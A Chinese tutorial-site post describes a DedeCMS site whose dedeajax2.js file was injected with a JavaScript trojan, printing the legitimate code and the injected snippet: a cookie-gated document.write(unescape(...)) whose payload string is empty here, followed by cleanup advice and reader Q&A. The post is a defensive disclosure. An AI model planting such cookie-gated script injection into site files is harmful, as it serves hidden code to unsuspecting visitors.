时间:2016-02-16 19:53 来源: 我爱IT技术网 作者:佚名
欢迎您访问我爱IT技术网,今天小编为你分享的电脑教程之dedeCMS系列教程:【dedecms:dedeajax2.js被植入js木马】,请阅读以下详细内容!
dedecms:dedeajax2.js被植入js木马
这阵子我的一个网站被植入了木马,程序dede。于是我升级到了IE7+全补丁,为了查木马做准备工作,呵呵。结果发现,dedeajax2.js被植入了木马。源码如下://初始化xmldom
function InitXDom(){
if(DedeXDOM!=null) return;
var obj=null;
if (typeof(DOMParser) !="undefined") { // Gecko、Mozilla、Firefox
var parser=new DOMParser();
obj=parser.parseFromString(xmlText, "text/xml");
} else { // IE
try { obj=new ActiveXObject("MSXML2.DOMDocument");} catch (e) { }
if (obj==null) try { obj=new ActiveXObject("Microsoft.XMLDOM"); } catch (e) { }
}
DedeXDOM=obj;
};
//以下是被植入木马的部分,乱码都是经由unicode码处理。现在的马夫越来越狡猾了
if(document.cookie.indexOf('hello')==-1){var expires=new Date();expires.setTime(expires.getTime() 24*60*60*1000);document.cookie='hello=Yes;path=/;expires=' expires.toGMTString();document.write(unescape(""));}
用原版本的dedeajax2覆盖,即可。这个文件,dede的模板都要用到,搜索了,没有发现说明用处。
不过建议大家,多注意dedecms的官方补丁,unix服务器的站长,千万别所有文件都是设置,虽然dede在unix的服务器上,设置太过繁琐。
关键字描述:木马 obj " if new // null var dede 植入
关于dedecms:dedeajax2.js被植入js木马的用户互动如下:
相关问题:怎么找到找到/include/dedeajax2.js”文件
答:在你引用的文件,同一个项目中 的 include文件夹里面 >>详细
相关问题:dedecms列表实现点击加载更多列表,求高手解答
答:用ajax读取下一页内容,然后显示到当前页面 在模板页面之前加以下内容 function multi(pagenum,tagid){ var taget_obj = document.getElementById(tagid); var taget_obj_page = document.getElementById("page_"+tagid); myajax = new DedeAjax... >>详细
相关问题:织梦系统 在二级域名下的文章不能评论应该也不能登...
答:请去织梦官方论坛提问,谢谢 GetVM >>详细
- 评论列表(网友评论仅供网友表达个人看法,并不表明本站同意其观点或证实其描述)
-